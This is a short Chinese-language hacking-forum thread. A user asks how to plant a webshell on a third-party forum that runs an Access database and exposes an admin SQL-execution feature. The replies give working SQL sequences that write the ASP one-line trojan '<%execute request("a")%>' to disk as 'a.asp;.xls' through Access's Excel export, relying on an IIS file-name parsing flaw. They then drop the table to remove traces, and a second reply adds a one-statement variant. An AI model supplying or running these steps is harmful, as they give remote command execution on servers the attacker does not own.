一個垃圾論壇，access數(shù)據(jù)庫，無其他可利用之處，不過有個sql語句執(zhí)行功能，絕對路徑也知道，小弟對sql語句不懂，記得如果是mysql數(shù)據(jù)庫root權限可以導出SHELL，這個是否也能導出shell呢？需要什么條件，語句又是什么？網(wǎng)上翻不到資料。麻煩各位。
答：
create table cmd (a varchar(50))
insert into cmd (a) values ( <%execute request("a")%> )
select * into [a] in f:\host\qhdyxt\web\a.asp;.xls excel 4.0; from cmd
drop table cmd
解釋如下：
1.create table a (a varchar(50)) 建立一個有一個A字段的表 表名為a 字段類型為字符 長度為50
2.insert into a (a) values ( <%execute request("a")%> ) 在表a的a字段插入密碼為a的一句話木馬
3.select * into [a] in F:\jt\work\a.asp;.xls excel 4.0; from a 把表a的內(nèi)容導出為物理路徑的一個
EXCEL文件，為什么用excel文件，因為ACCESS數(shù)據(jù)庫不允許導出其他危險格式。我們導出為EXCEL后在利用IIS解析漏洞就可以變成我們的小馬了。很*的說～～
4.drop table a 丟家伙閃人 射完就走！

小弟的提問，沒兩分鐘大家就回答了，強烈頂t00ls牛淫。
這個更簡單：
Access利用后臺SQL執(zhí)行命令功能導出WebShell:
SELECT <%execute request("a")%> into [vote] in d:\web\x.asp;.xls excel 8.0; from vote
后臺提供SQL執(zhí)行功能且知道絕對路徑方可使用(vote為已知表段)